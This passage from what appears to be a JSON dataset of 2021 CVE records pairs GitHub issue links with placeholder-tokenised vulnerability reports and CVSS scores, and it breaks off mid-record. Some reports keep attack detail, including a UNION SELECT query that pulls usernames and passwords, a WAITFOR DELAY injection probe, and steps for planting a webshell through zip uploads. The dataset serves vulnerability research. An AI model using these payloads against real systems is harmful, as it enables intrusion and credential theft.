  72197. "description": "Heap buffer overflow in APITAG in flac_buffer_copy. Hi, I found a vulnerability in current master NUMBERTAG bd NUMBERTAG b URLTAG . There is a heap buffer overflow in APITAG in flac_buffer_copy. The vulnerability can lead to heap based buffer overflow via a crafted sound file, and potentially control heap data by forge buffer content to perform heap exploitation. To reproduce on NUMBERTAG Ubuntu NUMBERTAG with clang NUMBERTAG CODETAG APITAG FILETAG ASAN report: ERRORTAG",
  72198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
  72199. "severity": "HIGH",
  72200. "baseScore": 7.1,
  72201. "impactScore": 4.2,
  72202. "exploitabilityScore": 2.8
  72203. },
  72204. {
  72205. "CVE_ID": "CVE-2021-41581",
  72206. "Issue_Url_old": "https://github.com/libressl-portable/openbsd/issues/126",
  72207. "Issue_Url_new": "https://github.com/libressl/openbsd/issues/126",
  72208. "Repo_new": "libressl/openbsd",
  72209. "Issue_Created_At": "2021-09-23T14:25:43Z",
  72210. "description": "stack buffer overflow in function APITAG The following program can make APITAG : ERRORTAG Here is the asan report: ERRORTAG This is because the buffer working is full of data and thus is not terminated with APITAG , and the call to strdup can crash the program. In the function APITAG of APITAG , the variable wi is the number of bytes already written into the buffer work; if wi is greater than or equal to APITAG , parsing should stop because the last byte should be APITAG . The following patch can fix this problem: CODETAG",
  72211. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72212. "severity": "MEDIUM",
  72213. "baseScore": 5.5,
  72214. "impactScore": 3.6,
  72215. "exploitabilityScore": 1.8
  72216. },
  72217. {
  72218. "CVE_ID": "CVE-2021-41641",
  72219. "Issue_Url_old": "https://github.com/denoland/deno/issues/12152",
  72220. "Issue_Url_new": "https://github.com/denoland/deno/issues/12152",
  72221. "Repo_new": "denoland/deno",
  72222. "Issue_Created_At": "2021-09-20T12:46:38Z",
  72223. "description": "APITAG Deno Sandbox Escape. The Deno file sandbox does not handle symbolic links correctly. When running Deno with specific write access the APITAG method can be used to gain access to any directory. Proof of concept: URLTAG",
  72224. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  72225. "severity": "HIGH",
  72226. "baseScore": 8.4,
  72227. "impactScore": 5.8,
  72228. "exploitabilityScore": 2.0
  72229. },
  72230. {
  72231. "CVE_ID": "CVE-2021-41652",
  72232. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/113",
  72233. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/113",
  72234. "Repo_new": "sruupl/batflat",
  72235. "Issue_Created_At": "2021-09-20T16:54:46Z",
  72236. "description": "Insecure permissions for APITAG The whole database can be easily dumped with a single http request URLTAG",
  72237. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  72238. "severity": "HIGH",
  72239. "baseScore": 7.5,
  72240. "impactScore": 3.6,
  72241. "exploitabilityScore": 3.9
  72242. },
  72243. {
  72244. "CVE_ID": "CVE-2021-41663",
  72245. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/41",
  72246. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/41",
  72247. "Repo_new": "bg5sbk/minicms",
  72248. "Issue_Created_At": "2021-09-21T10:09:19Z",
  72249. "description": "An xss vulnerability was found where my article was posted. FILETAG FILETAG",
  72250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72251. "severity": "MEDIUM",
  72252. "baseScore": 6.1,
  72253. "impactScore": 2.7,
  72254. "exploitabilityScore": 2.8
  72255. },
  72256. {
  72257. "CVE_ID": "CVE-2021-41672",
  72258. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/5",
  72259. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/5",
  72260. "Repo_new": "advisto/peel-shopping",
  72261. "Issue_Created_At": "2022-06-12T17:25:24Z",
  72262. "description": "SQL Injection in APITAG id_utilisateur POST parameter APITAG Product Version NUMBERTAG Author : Frentzen CVE Assigned : CVETAG Vulnerability Description : An authenticated user (with some administrator privileges) can inject a malicious query in order to achieve SQL injection via the \"id_utilisateur\" POST parameter on the PATHTAG endpoint. After this attack, the attacker can read sensitive information from the database and even modify its data. Vulnerable URL: FILETAG Proof of Concept: FILETAG FILETAG",
  72263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N",
  72264. "severity": "MEDIUM",
  72265. "baseScore": 6.5,
  72266. "impactScore": 5.2,
  72267. "exploitabilityScore": 1.2
  72268. },
  72269. {
  72270. "CVE_ID": "CVE-2021-41677",
  72271. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/202",
  72272. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/202",
  72273. "Repo_new": "os4ed/opensis-classic",
  72274. "Issue_Created_At": "2021-09-22T07:15:59Z",
  72275. "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG Grade= parameter FILETAG POC FILETAG REQUEST CODETAG RESPONSE ERRORTAG",
  72276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72277. "severity": "CRITICAL",
  72278. "baseScore": 9.8,
  72279. "impactScore": 5.9,
  72280. "exploitabilityScore": 3.9
  72281. },
  72282. {
  72283. "CVE_ID": "CVE-2021-41678",
  72284. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/203",
  72285. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/203",
  72286. "Repo_new": "os4ed/opensis-classic",
  72287. "Issue_Created_At": "2021-09-22T08:17:21Z",
  72288. "description": "SQL injection in function FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG staff FILETAG FILETAG POC FILETAG REQUEST ERRORTAG RESPONSE ERRORTAG SOLUTION Use function APITAG before assign $_REQUEST['staff'] to $value param. CODETAG",
  72289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72290. "severity": "CRITICAL",
  72291. "baseScore": 9.8,
  72292. "impactScore": 5.9,
  72293. "exploitabilityScore": 3.9
  72294. },
  72295. {
  72296. "CVE_ID": "CVE-2021-41679",
  72297. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/204",
  72298. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/204",
  72299. "Repo_new": "os4ed/opensis-classic",
  72300. "Issue_Created_At": "2021-09-22T08:56:02Z",
  72301. "description": "SQL INJECTION IN FUNCTION FILETAG . A SQL injection vulnerability exists in version NUMBERTAG of APITAG when APITAG or APITAG is used as the application database. An attacker can then issue the SQL command through the PATHTAG period parameter. FILETAG POC: FILETAG REQUEST: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: close Referer: URLTAG Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: APITAG APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html; charset=UTF NUMBERTAG FILETAG",
  72302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72303. "severity": "CRITICAL",
  72304. "baseScore": 9.8,
  72305. "impactScore": 5.9,
  72306. "exploitabilityScore": 3.9
  72307. },
  72308. {
  72309. "CVE_ID": "CVE-2021-41682",
  72310. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4747",
  72311. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4747",
  72312. "Repo_new": "jerryscript-project/jerryscript",
  72313. "Issue_Created_At": "2021-08-24T03:35:55Z",
  72314. "description": "heap use after free in APITAG APITAG revision NUMBERTAG bcd NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  72315. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72316. "severity": "HIGH",
  72317. "baseScore": 7.8,
  72318. "impactScore": 5.9,
  72319. "exploitabilityScore": 1.8
  72320. },
  72321. {
  72322. "CVE_ID": "CVE-2021-41683",
  72323. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4745",
  72324. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4745",
  72325. "Repo_new": "jerryscript-project/jerryscript",
  72326. "Issue_Created_At": "2021-08-24T03:27:50Z",
  72327. "description": "stack overflow in ecma_get_lex_env_type. APITAG revision APITAG Build platform APITAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  72328. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72329. "severity": "HIGH",
  72330. "baseScore": 7.8,
  72331. "impactScore": 5.9,
  72332. "exploitabilityScore": 1.8
  72333. },
  72334. {
  72335. "CVE_ID": "CVE-2021-41715",
  72336. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/27",
  72337. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/27",
  72338. "Repo_new": "libsixel/libsixel",
  72339. "Issue_Created_At": "2021-09-14T12:27:12Z",
  72340. "description": "heap use after free in PATHTAG Hi, I found a heap use after free in the current master fb NUMBERTAG URLTAG It appears to be the same as PATHTAG NUMBERTAG URLTAG (I just found the problem.) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: ERRORTAG and here is the ASAN report for saitoha/libsixel (the current master NUMBERTAG a5be8b URLTAG : ERRORTAG",
  72341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72342. "severity": "HIGH",
  72343. "baseScore": 8.8,
  72344. "impactScore": 5.9,
  72345. "exploitabilityScore": 2.8
  72346. },
  72347. {
  72348. "CVE_ID": "CVE-2021-41729",
  72349. "Issue_Url_old": "https://github.com/meiko-S/BaiCloud-cms/issues/3",
  72350. "Issue_Url_new": "https://github.com/meiko-s/baicloud/issues/3",
  72351. "Repo_new": "meiko-s/baicloud",
  72352. "Issue_Created_At": "2021-09-22T04:36:17Z",
  72353. "description": "Bug Report: Multiple Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG August NUMBERTAG Product version NUMBERTAG Download link Author: hibiki sama Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG kanacms\\user FILETAG It can be found that there is no verification, just judge whether it is the same as the previous or default, and then use unlink to delete the file as long as the file exists Therefore, the vulnerability analysis and utilization are very simple FILETAG We deleted the installed lock file / install / APITAG FILETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG There is an arbitrary file deletion vulnerability. I have to say that the system is really problematic in judging this The file causing the problem is in / user / FILETAG It is also a problem caused by the comparison between oldimg and img FILETAG Similar to the above analysis, it only judges whether it is the same as the original, and then splices.. 
/ and directly calls unlink, so the use is also very simple Just delete the hidden of the form attribute in HTML, and then directly enter the file name you want to delete",
  72354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  72355. "severity": "CRITICAL",
  72356. "baseScore": 9.1,
  72357. "impactScore": 5.2,
  72358. "exploitabilityScore": 3.9
  72359. },
  72360. {
  72361. "CVE_ID": "CVE-2021-41732",
  72362. "Issue_Url_old": "https://github.com/zeek/zeek/issues/1798",
  72363. "Issue_Url_new": "https://github.com/zeek/zeek/issues/1798",
  72364. "Repo_new": "zeek/zeek",
  72365. "Issue_Created_At": "2021-09-24T12:58:26Z",
  72366. "description": "There is a http request splitting vulnerability. By sending a specific HTTP POST request, ZEEK will split a request into multiple and split the wrong fields. This will invalidate any ZEEK HTTP based security APITAG ZEEK's internal security plug ins). POC APITAG Detailed information ZEEK version APITAG start ZEEK CODETAG Send normal request ERRORTAG ZEEK generates NUMBERTAG log The request method is POST, the host is APITAG and the uri is / FILETAG ERRORTAG send poc ERRORTAG ZEEK generates HTTP logs with NUMBERTAG errors The first display request method is POST, host is uri is / FILETAG The second display request method is bc, host is uri is abc The third display request method is POST, the host is APITAG and the uri is / FILETAG Obviously, ZEEK divides an HTTP request into three, and the request method, request host and request URI are misplaced. This will invalidate any ZEEK HTTP based analysis. HTTP request splitting vulnerability exists. ERRORTAG",
  72367. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  72368. "severity": "HIGH",
  72369. "baseScore": 7.5,
  72370. "impactScore": 3.6,
  72371. "exploitabilityScore": 3.9
  72372. },
  72373. {
  72374. "CVE_ID": "CVE-2021-41736",
  72375. "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/653",
  72376. "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/653",
  72377. "Repo_new": "grame-cncm/faust",
  72378. "Issue_Created_At": "2021-09-24T09:33:04Z",
  72379. "description": "Memory corruptions in Faust compiler. I went on with some tests (similarly to NUMBERTAG and I discovered overall NUMBERTAG different vulnerabilities. You can reproduce by compiling with asan enabled. Here I attach a resume of the stacktrace and the crashing inputs. If it is possible, I would like to request for at least some CVEs that I need for a paper. FILETAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fdc (pc NUMBERTAG fe0e NUMBERTAG a9fb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fe0e0e NUMBERTAG T2) Error location NUMBERTAG ba NUMBERTAG in APITAG , APITAG > >::vector(unsigned long, APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG a bp NUMBERTAG fff NUMBERTAG d NUMBERTAG sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 T0) Error location NUMBERTAG ba NUMBERTAG a in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG aec NUMBERTAG bp NUMBERTAG ffc NUMBERTAG b0 sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG T0) Error location NUMBERTAG aec NUMBERTAG in APITAG , APITAG > > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : ABRT on unknown address NUMBERTAG e NUMBERTAG fe8 (pc NUMBERTAG fc NUMBERTAG ecfb7 bp NUMBERTAG dc NUMBERTAG sp NUMBERTAG fc NUMBERTAG aa NUMBERTAG T2) Error location NUMBERTAG b NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : stack overflow on address NUMBERTAG ffec7cfdf NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffec7cfe7b0 sp NUMBERTAG ffec7cfdf NUMBERTAG T0) Error location NUMBERTAG d NUMBERTAG in __interceptor_strcmp ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : heap buffer overflow on address 
NUMBERTAG cb8 at pc NUMBERTAG b9f8f9 bp NUMBERTAG fe NUMBERTAG fac NUMBERTAG sp NUMBERTAG fe NUMBERTAG fac NUMBERTAG Error location NUMBERTAG b9f8f8 in APITAG , APITAG , APITAG , APITAG , APITAG > > const&) propagate.cpp Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG a bp NUMBERTAG fff5c0e NUMBERTAG d0 sp NUMBERTAG fff5c0e3cc0 T0) Error location NUMBERTAG f NUMBERTAG a in APITAG , APITAG ) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ed6b6 bp NUMBERTAG ffd6c0d NUMBERTAG e0 sp NUMBERTAG ffd6c0d NUMBERTAG e0 T0) Error location NUMBERTAG ed6b6 in APITAG , APITAG , APITAG , APITAG , APITAG , APITAG , APITAG std::char_traits APITAG , std::allocator APITAG > const&) ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG Error type : SEGV on unknown address NUMBERTAG pc NUMBERTAG ba NUMBERTAG bp NUMBERTAG fffc NUMBERTAG a9d0 sp NUMBERTAG fffc NUMBERTAG a8e0 T0) Error location NUMBERTAG ba NUMBERTAG in ppsig::printui(std::ostream&, APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG ) const ( PATHTAG ) Testcase path : PATHTAG Testcase size NUMBERTAG APITAG",
  72380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72381. "severity": "CRITICAL",
  72382. "baseScore": 9.8,
  72383. "impactScore": 5.9,
  72384. "exploitabilityScore": 3.9
  72385. },
  72386. {
  72387. "CVE_ID": "CVE-2021-41746",
  72388. "Issue_Url_old": "https://github.com/purple-WL/Yonyou-TurboCRM-SQL-injection/issues/1",
  72389. "Issue_Url_new": "https://github.com/purple-wl/yonyou-turbocrm-sql-injection/issues/1",
  72390. "Repo_new": "purple-wl/yonyou-turbocrm-sql-injection",
  72391. "Issue_Created_At": "2021-09-26T09:31:04Z",
  72392. "description": "SQL injection. Yonyou APITAG is a customer relationship management system. Yonyou APITAG has SQL injection vulnerabilities. Attackers can use the vulnerabilities to obtain sensitive database information. Visit FILETAG and click OK FILETAG Capture the packet and enter the SQL statement WAITFOR DELAY NUMBERTAG in the orgcode parameter There is a delay and an error is reported: FILETAG Use APITAG to scan for injection points FILETAG",
  72393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  72394. "severity": "HIGH",
  72395. "baseScore": 7.5,
  72396. "impactScore": 3.6,
  72397. "exploitabilityScore": 3.9
  72398. },
  72399. {
  72400. "CVE_ID": "CVE-2021-41752",
  72401. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4779",
  72402. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4779",
  72403. "Repo_new": "jerryscript-project/jerryscript",
  72404. "Issue_Created_At": "2021-09-23T13:13:53Z",
  72405. "description": "stack overflow in APITAG APITAG revision e1ce7dd7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Linu NUMBERTAG generic NUMBERTAG with glibc NUMBERTAG Build steps PATHTAG clean debug compile flag= fsanitize=address \\ compile flag= m NUMBERTAG compile flag= fno omit frame pointer \\ compile flag= fno common compile flag= g strip=off \\ system allocator=on logging=on linker flag= fuse ld=gold \\ error messages=on lto=off stack limit NUMBERTAG Test case ERRORTAG Execution platform the same as the build platform. Output ERRORTAG Backtrace see above",
  72406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72407. "severity": "CRITICAL",
  72408. "baseScore": 9.8,
  72409. "impactScore": 5.9,
  72410. "exploitabilityScore": 3.9
  72411. },
  72412. {
  72413. "CVE_ID": "CVE-2021-41821",
  72414. "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/9201",
  72415. "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/9201",
  72416. "Repo_new": "wazuh/wazuh",
  72417. "Issue_Created_At": "2021-07-05T16:36:54Z",
  72418. "description": "Potential integer underflow in the remoted (agent-facing) code. APITAG APITAG APITAG APITAG | | | | | | | Latest | Remoted| APITAG | APITAG | OS version | Hello team, After reviewing the remoted code, we observed something that should be checked because it can lead to an integer underflow. Specifically here: URLTAG After the size is computed, and depending on the input value, the following expression can end up with a lower value than expected (a lower-bound check on the incoming length before the subtraction would prevent this): URLTAG For instance, with a buffer of APITAG Regards, Miguel Casares",
  72419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  72420. "severity": "MEDIUM",
  72421. "baseScore": 6.5,
  72422. "impactScore": 3.6,
  72423. "exploitabilityScore": 2.8
  72424. },
  72425. {
  72426. "CVE_ID": "CVE-2021-41826",
  72427. "Issue_Url_old": "https://github.com/PlaceOS/auth/issues/36",
  72428. "Issue_Url_new": "https://github.com/placeos/auth/issues/36",
  72429. "Repo_new": "placeos/auth",
  72430. "Issue_Created_At": "2021-09-28T15:52:23Z",
  72431. "description": "CVETAG : URL Redirection to Untrusted Site ('Open Redirect'). The application accepts user-controlled input that specifies a link to an external site and uses that link in a redirect without validating it. This makes phishing attacks easier, since a victim who follows a link on the trusted domain is sent to an attacker-chosen site. Mitigation: only redirect to relative paths or to hosts on an explicit allow-list. CODETAG FILETAG Payload: URLTAG",
  72432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72433. "severity": "MEDIUM",
  72434. "baseScore": 6.1,
  72435. "impactScore": 2.7,
  72436. "exploitabilityScore": 2.8
  72437. },
  72438. {
  72439. "CVE_ID": "CVE-2021-41862",
  72440. "Issue_Url_old": "https://github.com/killme2008/aviatorscript/issues/421",
  72441. "Issue_Url_new": "https://github.com/killme2008/aviatorscript/issues/421",
  72442. "Repo_new": "killme2008/aviatorscript",
  72443. "Issue_Created_At": "2021-09-30T09:20:15Z",
  72444. "description": "There is a critical expression injection RCE vulnerability in this expression engine\uff08\u8be5\u8868\u8fbe\u5f0f\u5f15\u64ce\u5b58\u5728\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff09. Objects can be instantiated with new directly inside an Aviator expression, although calling non-public static methods is not allowed. The APITAG can be used to load BCEL-encoded bytecode, which is enough to achieve RCE whenever untrusted input reaches the expression engine. First prepare a malicious APITAG whose public static method exec executes arbitrary commands. APITAG APITAG APITAG static\u65b9\u6cd5exec\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\uff09 ERRORTAG Then encode it in BCEL. \uff08\u7136\u540e\u5c06\u5176BCEL\u7f16\u7801\u3002\uff09 ERRORTAG Prepare the vulnerability environment. Use the latest version of aviatorscript. \uff08\u51c6\u5907\u6f0f\u6d1e\u73af\u5883\u3002\u4f7f\u7528\u6700\u65b0\u7248\u7684aviatorscript\u3002\uff09 CODETAG Perform aviator expression injection. \uff08\u8fdb\u884caviator\u8868\u8fbe\u5f0f\u6ce8\u5165\u3002\uff09 CODETAG The command was executed successfully. \uff08\u6210\u529f\u6267\u884c\u547d\u4ee4\u3002\uff09 FILETAG",
  72445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72446. "severity": "CRITICAL",
  72447. "baseScore": 9.8,
  72448. "impactScore": 5.9,
  72449. "exploitabilityScore": 3.9
  72450. },
  72451. {
  72452. "CVE_ID": "CVE-2021-41868",
  72453. "Issue_Url_old": "https://github.com/onionshare/onionshare/issues/1396",
  72454. "Issue_Url_new": "https://github.com/onionshare/onionshare/issues/1396",
  72455. "Repo_new": "onionshare/onionshare",
  72456. "Issue_Created_At": "2021-08-21T11:13:36Z",
  72457. "description": "File uploaded before checking for user's authentication. Version: APITAG cli NUMBERTAG installed via pip3) Start up: onionshare cli receive Observed behavior: Unauthenticated users (not passing the APITAG Basic_ header) are still able to upload files on the remote machine running APITAG NUMBERTAG The problem is probably related to the logic in FILETAG in which uploaded files are received and written to disk before the request's authentication is checked, so the check apparently runs only after the file has already been stored. This issue affects both endpoints: POST /upload and POST /upload ajax. Proof of concept images attached FILETAG FILETAG",
  72458. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72459. "severity": "CRITICAL",
  72460. "baseScore": 9.8,
  72461. "impactScore": 5.9,
  72462. "exploitabilityScore": 3.9
  72463. },
  72464. {
  72465. "CVE_ID": "CVE-2021-41921",
  72466. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/62",
  72467. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/62",
  72468. "Repo_new": "201206030/novel-plus",
  72469. "Issue_Created_At": "2021-09-29T03:20:17Z",
  72470. "description": "There is unrestricted file upload in your source code. File path: PATHTAG Code: the upload handler does not restrict the uploaded file type. ERRORTAG An attacker can compromise the server by uploading a malicious JSP file (a webshell) and then requesting it. Example: FILETAG",
  72471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72472. "severity": "CRITICAL",
  72473. "baseScore": 9.8,
  72474. "impactScore": 5.9,
  72475. "exploitabilityScore": 3.9
  72476. },
  72477. {
  72478. "CVE_ID": "CVE-2021-41938",
  72479. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/64",
  72480. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/64",
  72481. "Repo_new": "gongfuxiang/shopxo",
  72482. "Issue_Created_At": "2021-09-30T03:31:31Z",
  72483. "description": "After entering the management page, there is an arbitrary file upload vulnerability in NUMBERTAG locations. Affects version APITAG After logging into the management page as administrator there is an arbitrary file upload vulnerability in NUMBERTAG locations through which a webshell can be uploaded into the site (the uploaded zip is extracted with only a php-suffix check on its contents). The first location: APITAG the post url is APITAG the steps are NUMBERTAG download the default theme from FILETAG NUMBERTAG unzip the zip NUMBERTAG because the file security check only rejects files with the \"php\" suffix, delete those and add a malicious file named FILETAG or APITAG in the \"css\" folder and the root folder FILETAG FILETAG NUMBERTAG recompress the files as a new zip file NUMBERTAG upload it and the malicious file ends up in APITAG and APITAG FILETAG The second location: APITAG the post url is APITAG like the first location NUMBERTAG download any plugin from FILETAG like this NUMBERTAG unzip the zip NUMBERTAG add a malicious file named FILETAG in the APITAG folder NUMBERTAG recompress the files as a new zip file NUMBERTAG upload it and the malicious file ends up in APITAG FILETAG The third location: APITAG the post url is APITAG the steps are NUMBERTAG create a malicious file APITAG and compress it as a new zip file NUMBERTAG upload it and the malicious file ends up in APITAG FILETAG",
  72484. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72485. "severity": "HIGH",
  72486. "baseScore": 7.2,
  72487. "impactScore": 5.9,
  72488. "exploitabilityScore": 1.2
  72489. },
  72490. {
  72491. "CVE_ID": "CVE-2021-41945",
  72492. "Issue_Url_old": "https://github.com/encode/httpx/issues/2184",
  72493. "Issue_Url_new": "https://github.com/encode/httpx/issues/2184",
  72494. "Repo_new": "encode/httpx",
  72495. "Issue_Created_At": "2022-04-21T03:46:42Z",
  72496. "description": "Some URLs can make httpx use a URL with the wrong components. After some research, I found that APITAG and APITAG may implicitly parse a URL incorrectly because of the improper implementation of APITAG . This can lead to blacklist (deny-list) bypasses, i.e. a URL that passes a caller's check may be requested with different components. For example: APITAG CODETAG APITAG CODETAG Main reason: URLTAG APITAG parses ERRORTAG before returning the new URL, but the new URL string returned by ERRORTAG may make unintended changes to the new URL. For example: ERRORTAG So if a function is using APITAG , it may have the same issue as APITAG and APITAG , too APITAG example, APITAG ). I also made a patch PR for this issue by replacing ERRORTAG with: APITAG By the way, I think this issue is similar to FILETAG and FILETAG . If you want to assign a CVE id for this issue to remind httpx's users, you can use these categories.",
  72497. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  72498. "severity": "CRITICAL",
  72499. "baseScore": 9.1,
  72500. "impactScore": 5.2,
  72501. "exploitabilityScore": 3.9
  72502. },
  72503. {
  72504. "CVE_ID": "CVE-2021-41947",
  72505. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/887",
  72506. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/887",
  72507. "Repo_new": "intelliants/subrion",
  72508. "Issue_Created_At": "2021-09-28T06:23:17Z",
  72509. "description": "SQL injection in visual mode (requires admin login). Log in as admin, then go to \" URLTAG UNION ALL SELECT username, password FROM sbr NUMBERTAG members APITAG ; the injected UNION query returns the username and password columns of the members table. FILETAG",
  72510. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72511. "severity": "HIGH",
  72512. "baseScore": 7.2,
  72513. "impactScore": 5.9,
  72514. "exploitabilityScore": 1.2
  72515. },
  72516. {
  72517. "CVE_ID": "CVE-2021-41948",
  72518. "Issue_Url_old": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
  72519. "Issue_Url_new": "https://github.com/intelliants/subrion-plugin-contact_us/issues/8",
  72520. "Repo_new": "intelliants/subrion-plugin-contact_us",
  72521. "Issue_Created_At": "2021-09-28T06:48:55Z",
